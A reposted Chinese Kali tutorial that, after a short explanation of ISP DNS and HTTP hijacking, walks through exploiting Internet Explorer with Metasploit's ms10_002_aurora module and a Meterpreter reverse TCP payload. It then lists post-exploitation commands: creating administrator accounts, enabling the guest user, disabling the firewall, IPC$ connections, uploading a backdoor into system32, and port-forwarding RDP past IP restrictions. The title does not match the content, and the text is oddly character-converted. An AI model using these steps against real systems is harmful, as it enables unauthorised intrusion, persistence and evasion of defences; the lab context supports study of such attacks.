天天看點

kali之DNS劫持

DNS劫持:使用者上網的DNS伺服器都是營運商配置設定的,是以,在這個節點上,營運商可以為所欲為

例如:通路一個網站,輸入域名,正常DNS伺服器傳回該域名的IP,而DNS劫持後,會傳回一個營運商額中間伺服器IP,該通路伺服器會一緻性的傳回302,讓使用者浏覽器跳轉到預處理好的帶廣告的網頁,在該網頁中再通過iframe打開使用者原來通路的位址

HTTP劫持:

在營運商的路由器節點上,設定協定檢測,一旦發現是http請求,而且是html類型請求,則攔截處理。後續做法往往分為2種、1種是DNS劫持傳回302讓使用者浏覽器跳轉到另外的位址,還有1種是在伺服器傳回的HTML資料中插入js或dom節點廣告

保證網絡連通性,配置網絡位址

<a href="https://s1.51cto.com/wyfs02/M01/9A/42/wKioL1lTbDHAQNoTAAONomhQPZA494.jpg" target="_blank"></a>

第一次使用msfconsole,開啟内建的資料庫PostgreSQL和metasplote

開啟PostgreSQL:  service postgresql start

開啟metasploit:  service metasploit start 

 root@kali:~ps -e|grep 5432(確定postgresql服務開啟,預設占用端口是5432)

root@kali:~# msfconsole

<a href="https://s3.51cto.com/wyfs02/M02/9A/41/wKiom1lTa_zwGengAAHy0wFA5dc620.jpg" target="_blank"></a>

查找10-002漏洞子產品 search 10-002

<a href="https://s3.51cto.com/wyfs02/M02/9A/42/wKiom1lTbGOjUMbrAANSYfqtYH8138.jpg" target="_blank"></a>

use exploit/windows/browser/ms10_002_aurora 進行漏洞攻擊

set payload windows/meterpreter/reverse_tcp 定義攻擊載荷 

set lhost 192.168.48.123 定義本機位址

set URIPATH / 定義url的字尾(這裡我隻設定了一個/)

exploit 開發

<a href="https://s4.51cto.com/wyfs02/M02/9A/42/wKiom1lTbLDTHqYGAAPi-BV6hUk489.jpg" target="_blank"></a>

在攻擊主機打開目标網站http://192.168.48.123:8080/

<a href="https://s5.51cto.com/wyfs02/M01/9A/42/wKioL1lTbUjyzITDAAFdKKRfjFM974.jpg" target="_blank"></a>

sessions -i 1 打開連接配接會話

session 檢視已經成功擷取的會話,使用session -i 連接配接到指定序号的meterpreter會話已繼續利用

通過shell 擷取目标主機的遠端指令行

通過DOS建立賬号與密碼

<a href="https://s5.51cto.com/wyfs02/M01/9A/48/wKioL1lTpiCSq6kFAAJvTNv0odM262.jpg" target="_blank"></a>

Windows常用指令

<a href="https://s4.51cto.com/wyfs02/M00/06/69/wKiom1m3w46QYwW8AAHHQNERV7M910.jpg" target="_blank"></a>

1、net localgroup administrators    使用者名 密碼 /add(将使用者加到管理者,使其擁有管理權限)

2、net user guest /active:yes (激活guest使用者)

3、net user guest 12345 (修改guest密碼為12345)

4、net user (檢視賬号屬性)

5、net start  (檢視開啟了那些服務)

6、net time \\ 目标ip   (檢視對方時間)

7、net view (檢視區域網路中開啟了那些共享)

8、net share  (檢視本地開啟的那些共享)

9、net share C$/del        (删除c盤預設共享)

10、Copy xx.exe\\ip\admin$\System32 (将目前xx.exe複制到對方Admin$共享的System32目錄内)

11、sc config tlnesvr start= auto (修改telnet服務的啟動方式為自動,auto前面有一個空格)

12、net stop sharedaccess(關閉系統自帶的防火牆)

13、net send IP 消息(利用messenger服務向目标IP發送消息)

14、tasklist(檢視程序)

15、taskkill (結束程序)ntsd     強制結束程序

16、services.msc   進入本地計算機的服務

17、net use \\ip\ipc$ “” /user (建立空IPC連結)

18、net use \\ip\ipc$ “密碼” /user:”使用者名”(建立IPC非空連接配接,非空連結就是需要賬戶和密碼)

19、net use \\ip\ipc$ /del   (删除ipc空連接配接)

20、net use z: \\127.0.0.1\c$  (映射目标主機磁盤c盤到本地磁盤z盤)

遠端連接配接該系統

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

<a href="https://s1.51cto.com/wyfs02/M00/9A/48/wKiom1lTpoqz2fysAAM7hxopnrk036.jpg" target="_blank"></a>

getuid檢視meterpreter注入到目标主機的程序所屬使用者

upload指令上傳檔案到目标主機,例如把後門程式setup.exe傳到目标主機system32目錄下

upload  setup.exe  C:\\windows\\system32\

portfwd 端口轉發

例如目标主機上開啟了3389,但是隻允許特定IP通路,攻擊主機無法連接配接,可以使用portfwd指令把目标主機的3389端口轉發到其他端口打開

例如:portfwd  add -l  1122 -p 3389 -r  192.168.48.100

把目标主機192.168.48.100的3389端口轉發到1122端口

這是隻需要連接配接目标的1122端口就可以打開遠端桌面了

rdesktop  -u  administrator  -p  123456  192.168.48.100:1122

sysinfo檢視目标主機系統資訊

ps 檢視目标主機上運作的程序資訊,結合migrate使用

本文轉自 周小玉 51CTO部落格,原文連結:http://blog.51cto.com/maguangjie/1942769,如需轉載請自行聯系原作者

下一篇: kali之Nmap

繼續閱讀